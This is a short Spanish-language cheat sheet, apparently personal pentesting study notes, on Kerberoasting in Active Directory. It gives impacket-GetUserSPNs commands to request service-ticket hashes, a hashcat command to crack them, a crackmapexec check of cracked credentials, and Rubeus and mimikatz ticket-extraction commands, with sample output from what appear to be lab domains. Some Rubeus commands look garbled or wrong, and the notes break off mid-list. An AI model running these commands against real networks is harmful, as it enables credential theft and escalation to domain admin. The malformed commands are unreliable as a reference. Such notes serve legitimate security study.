Kerberoasting
- Este ataque sirve para obtener credenciales de cuentas de servicios que están configurados con la autenticación Kerberos.
- En AD comunmente las cuentas de servicios tienen privilegios muy elevados.
- Más info
Como funciona
- Solicitud TGS
- Obtener Ticket.
- Extraerlo con mimikatz o rubeus
- Fuerza bruta o pass the ticket
sudo impacket-GetUserSPNs DOMAIN.LOCAL/USER:password -dc-ip IP -request
- Guardar hash
hashcat -m 13100 hash.txt wordlist.txt
Listar cuentas
impacket-GetUserSPNs -dc-ip IP DOMAIN.LOCAL/USER
impacket-GetUserSPNs -request -dc-ip 172.16.139.3 -target-domain trilocor.local trilocor.local/pthorpe
- Ejemplo: ```powershell Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
——————————————— —————– —————————————————————————————- ————————– ——— ———-
backupjob/veam001.inlanefreight.local BACKUPAGENT CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL 2022-02-15 17:15:40.842452
Chequear cuenta post crackeo
sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!
Extraer tickets desde Windows
Rubeus.exe asktgt /user:<usuario> /rc4:<contraseña>
Rubeus.exe tgtreq /user:<usuario> /rc4:<spn>
Rubeus tgtdeleg /ticket:<ticket_file>
- mimikatz:
mimikatz.exe "kerberos::list" "exit"
- mimikatz: